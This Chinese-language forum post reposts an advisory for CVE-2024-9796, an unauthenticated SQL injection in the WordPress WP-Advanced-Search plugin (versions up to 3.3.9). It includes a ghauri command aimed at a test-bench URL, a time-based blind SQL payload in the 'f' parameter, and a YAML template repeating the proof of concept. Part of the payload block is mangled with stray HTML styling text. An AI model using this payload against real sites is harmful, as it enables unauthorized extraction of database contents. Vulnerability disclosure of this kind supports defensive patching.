吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 35|回复: 0

CVE-2024-9796 漏洞

[复制链接]

该用户从未签到

231

主题

231

帖子

729

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
729
发表于 2025-8-6 12:56:57 | 显示全部楼层 |阅读模式
WordPress WP-Advanced-Search <= 3.3.9 - 未经身份验证的 SQL 注入漏洞

描述
WordPress 的 WP-Advanced-Search 插件(最高版本为 3.3.9 及包括 3.3.9)容易受到 SQL 注入的攻击。此漏洞的存在是由于用户提供的参数转义不足和缺乏 SQL 查询准备。因此,未经身份验证的攻击者可以将额外的 SQL 查询注入现有查询,从而有可能从数据库中提取敏感信息。
漏洞详情
  • 类型:插件
  • CVSS 分数:7.5(高)
  • CVE:CVE-2024-9796
  • 插件 Slug:wp-advanced-search
下载链接
概念验证 (PoC)
使用端点利用 SQL 注入漏洞的示例:autocompletion-PHP5.5.php
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"

有效负载示例
以下有效负载演示了使用 vulnerable 参数的基于时间的盲 SQL 注入:f
[color=rgba(0, 0, 0, 0.96)][color=rgba(0, 0, 0, 0.88)][color=rgba(0, 0, 0, 0.96)]





Parameter: f (GET)Type: time-based blindTitle: MySQL >= 5.0.12 time-based blind (IF - comment)Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853= 5.0.12 time-based blind (IF - comment)Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853" tabindex="0" role="button" style="box-sizing: border-box; position: relative; font-size: 14px; line-height: 20px; text-wrap-mode: nowrap; vertical-align: middle; cursor: pointer; user-select: none; border: 0px; border-radius: 6px; appearance: none; color: rgb(9, 105, 218); background-color: rgba(0, 0, 0, 0); box-shadow: none; transition: color 80ms cubic-bezier(0.33, 1, 0.68, 1), background-color, box-shadow, border-color; width: 28px; height: 28px; display: flex !important; justify-content: center !important; align-items: center !important; margin: 8px !important;">

[color=rgba(0, 0, 0, 0.96)][color=rgba(0, 0, 0, 0.88)][color=rgba(0, 0, 0, 0.96)]





id: CVE-2024-9796 info:  name: "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection"  author: "Issam Junior"  severity: "critical"  metadata:    verified: true    max-request: 2  tags: "github.com/fa-rrel ==> WHAT DO YOU THINK ABOUT ME ?"variables:  cve: "CVE-2024-9796"  plugin_name: "wp-advanced-search"  plugin_version: "3.3.9"  type: "plugin"  description: |    The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9.     This vulnerability is caused by insufficient escaping on user-supplied parameters and a lack of proper preparation of the existing SQL query.    This makes it possible for unauthenticated attackers to append arbitrary SQL queries to existing queries, potentially leading to the     extraction of sensitive information from the database.  download_link: "https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip"  cvss_score: 7.5poc:  - "ghauri -u \"https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899\""  - "Parameter: f (GET)"  - "Type: time-based blind"  - "Title: MySQL >= 5.0.12 time-based blind (IF - comment)"  - "Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853'"




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

GMT+8, 2025-8-21 22:56 , Processed in 0.079167 second(s), 24 queries .

Powered by 吾要学习

Copyright © 2001-2025, wuyaoxuexi.cn.

快速回复 返回顶部 返回列表